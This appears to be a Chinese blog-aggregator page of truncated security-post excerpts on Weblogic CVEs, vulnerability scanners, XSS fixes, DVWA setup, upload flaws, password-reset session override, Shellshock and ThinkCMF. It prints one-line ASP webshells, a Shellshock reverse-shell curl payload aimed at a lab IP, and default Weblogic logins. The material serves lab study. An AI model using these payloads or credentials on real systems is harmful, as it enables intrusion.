漏洞

Weblogic相关漏洞

柔情痞子 提交于 2020-01-17 08:52:55
目录 Weblogic Weblogic出现过的漏洞 SSRF(CVE-2014-4210) 任意文件上传(CVE-2018-2894) JAVA反序列化 CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) CVE-2018-2893 CVE-2019-2725 CVE-2019-2729 Weblogic远程代码执行漏洞(CVE-2020-2546) Weblogic远程代码执行漏洞(CVE-2020-2551) XMLDecoder反序列化 CVE-2017-3506 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic后台部署war包getshell Weblogic 默认端口 :7001 、7002 Google关键字 :WebLogic Server AdministrationConsole inurl:console 常见默认口令: 用户名:system 密码:password 用户名:weblogic 密码:weblogic 用户名:admin 密码:security 用户名:portadmin 密码

网络安全开源扫描引擎

笑着哭i 提交于 2020-01-17 03:19:06
python redis awvs api nessus api =========================================== https://github.com/boy-hack/bugscan w8ay专属扫描器 =========================================== https://github.com/MXi4oyu/DockerXScan DockerXScan——Docker镜像漏洞扫描器 =========================================== https://github.com/netxfly/passive_scan 分布式 基于代理的web扫描器 =========================================== https://github.com/boy-hack/w8scan =========================================== https://github.com/blackye/BkScanner BkScanner 分布式、插件化web漏洞扫描器 =========================================== https://github.com/sowish/LNScan

开源漏洞检测框架收集

泪湿孤枕 提交于 2020-01-17 03:18:08
https://github.com/We5ter/Scanners-Box 项目简介 Scanners Box是一个集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举、数据库漏洞扫描、弱口令或信息泄漏扫描、端口扫描、指纹识别以及其他大型扫描器或模块化扫描器,同时该仓库只收录各位网友自己编写的一般性开源扫描器,类似awvs、nmap、w3af等知名扫描工具不收录。 Osprey 鱼鹰 https://github.com/TophantTechnology/osprey Gourdscan v2.1 被动式漏洞扫描系统 https://github.com/ysrc/GourdScanV2 w9scan https://github.com/boy-hack/w9scan CMS-Exploit-Framework https://github.com/Q2h1Cg/CMS-Exploit-Framework POC-Collect https://github.com/Mr5m1th/POC-Collect https://github.com/he1m4n6a/btScan/ cmsPoc https://github.com/CHYbeta/cmsPoc 专用扫描器: https://github.com/blackye/Jenkins

web端常见安全漏洞测试结果分析-- appscan

天涯浪子 提交于 2020-01-17 03:02:42
基于appscan测试结果分析: 一、XSS跨站脚本 指的是攻击者往 Web 页面里插入恶意html代码,通常是JavaScript编写的恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。是最常见的Web应用程序安全漏洞之一 JavaScript可以用来获取用户的cookie、改变网页内容、URL调转,存在XSS漏洞的网站,可以盗取用户cookie、黑掉页面、导航到恶意网站 攻击的主要途径: 1.对普通的用户输入,页面原样内容输出 2.在代码区里有用户输入的内容(代码区中,绝对不应含有用户输入的东西) 3.允许用户输入HTML标签的页面 攻击解决办法:(过滤输入和转义输出) 1.在输入方面对所有用户提交内容进行可靠的输入验证,不要信赖客户输入(URL、查询关键字、http头、post数据等) 2.在输出方面,在用户输内容中使用<XMP>标签。标签内的内容不会解释,直接显示。 3.严格执行字符输入字数控制。 4.在脚本执行区中,绝不可以让用户输入 Eg: 1、用户名、密码等敏感输入字段未经加密就进行了传递 整改建议: 在被测应用与服务器交互过程中,对密码等敏感信息进行加密传输。 2. 未对用户输入正确执行危险字符清理 整改建议: 在被测应用与服务器交互过程中,对所有用户提交内容进行可靠的输入验证或编码。 二、URL 重定向包含网络钓鱼

centos7 搭建DVWA漏洞环境(二)

拜拜、爱过 提交于 2020-01-17 01:38:11
centos7 搭建DVWA漏洞环境(一) 中安装好了LANMP,达到了linux+apache+MySQL+PHP的环境要求 安装DVWA 下载 DVWA 的官方网站: http://www.dvwa.co.uk/ DVWA 的 Github 页面: https://github.com/ethicalhack3r/DVWA 下载安装包后,上传解压到文件夹 /home/wwwroot/default/ ( LAMP 默认的网站目录)内 配置 进入 /home/wwwroot/default/DVWA/config ,将配置文件复制一份 cp config.inc.php.dist config.inc.php vim config.inc.php Create / Reset Database 完成上述步骤后,访问 http://192.168.194.6/DVWA ,将会被重定向至 http:// 192.168.194.6 /DVWA/setup.php ,单击页面底部的 Create / Reset Database 按钮,即可跳转至 DVWA 的登陆页面 默认账号是admin,密码是password。 来源: CSDN 作者: 短腿长颈鹿小姐 链接: https://blog.csdn.net/qq_40673345/article/details/104008522

【web安全深度剖析】笔记——上传漏洞

折月煮酒 提交于 2020-01-16 22:47:45
IIS6.0解析漏洞 当文件夹名命名为XX.asa或XX.asp时,文件夹中的所有文件都会被当做asp文件来执行 当文件命名为*.asp;1.jpg时,此文件会被当做asp文件来执行 WebDav漏洞:开启webdav后,可扩展move、copy、delete等HTTP方法,此时即可put一个a.txt写入一句话木马,并通过copy或move改名为xx.asp,这样即可轻松上传一个webshell。同样可以使用delete方法删除任意文件。 APACHE漏洞 Apache在解析文件时有一个原则:当碰到不认识的扩展名时,将会从后向前解析,直到碰为止,如果都不认识,则会暴露其源代码。比如:1.php.rar ,apache不认识rar后缀,就会解析成php文件。 PHP CGI解析漏洞 当在正常网页www.xx.com/1.jpg后面加上/xx.php时(xx.php文件不需要存在),1.jpg就会被当成PHP脚本来运行。 因为PHP的配置文件中cgi.if选项默认开启向前递归解析,当xx.php文件不存在时,就解析上一级文件,造成解析漏洞。 中国菜刀与一句话木马 往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录 各语言的一句话代码 asp: <%eval request ("pass")%> aspx: <%@ Page

记一次任意用户密码重置漏洞(session覆盖)

*爱你&永不变心* 提交于 2020-01-16 19:01:34
首先,注册用户(两个用户),我用我的小号,大号进行注册,过程方便就先省略 接下来两个号分别登录,登录完退出 (强迫症) 然后就去找密码重置的界面了 第一个是被重置的帐户 然后分别发送邮件 注意!:第一个先发送,在发送第二个 可以看到,两个号都发送成功 接下来去第二个号的邮箱 点击这个链接之后出现页面,然后在url中修改qq,如下图 ok,输入密码和验证码后,提交之后: good 登录 好了,漏洞验证成功, sessio覆盖漏洞原理: 简单的说:就是第二次发送给服务端的session覆盖了第一次发送给服务端的session,从而通过了验证,造成漏洞 注:本文仅供学习和参考 来源: CSDN 作者: qq_4444444 链接: https://blog.csdn.net/qq_42943680/article/details/104004546

CVE-2014-6271漏洞复现

…衆ロ難τιáo~ 提交于 2020-01-16 16:41:27
0x00 前言 要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现 0x01 正文 这里直接使用别人弄好的docker,简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后,开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问目标页面 这里还需要知道一个路劲,直接dirb 这里接着对cgi-bin进行一个爆破 最后拿到目标 执行payload: curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats 这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得) kali监听就行 来源: CSDN 作者: Bubble_zhu 链接: https://blog.csdn.net/qq_36869808/article/details/104005219

逻辑漏洞归纳总结

核能气质少年 提交于 2020-01-16 16:25:44
Web安全渗透方向,三大核心:输入输出、登录体系、权限认证。 典型的web漏洞:注入、跨站、上传、代码执行等属于输入输出这个层级,这也是OWASP早期比较侧重的;近年来,像越权漏洞、逻辑绕过、接口安全等逐渐增多,这些属于登录体系和权限认证这个层级。 业务逻辑漏洞主要包括以下分类: 1.登录体系安全 2.业务一致性 3.业务数据篡改 4.密码找回 5.验证码突破 6.会话权限 7.数据重放 8.接口安全 来源: https://www.cnblogs.com/nongchaoer/p/12201516.html

ThinkCMF&tp3.2漏洞

杀马特。学长 韩版系。学妹 提交于 2020-01-16 16:14:31
hinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。 2 | 0 0x01 漏洞概述 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 3 | 0 0x02 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 ThinkCMF X2.2.3 4 | 0 0x03 环境搭建 本次使用的环境版本是2.2.3,直接放到phpstudy的目录下,访问路径/ThinkCMFX/发现ThinkCMF很人性化的加载了安装向导,因此按照它的步骤一步一步来即可(2.2.3版本安装包获取方式:文末公众号内回复“ThinkCMF环境”) 填写好数据库密码以及管理员信息(phpstudy的数据库默认密码为root) 继续下一步,环境搭建成功如图所示 5 | 0 0x04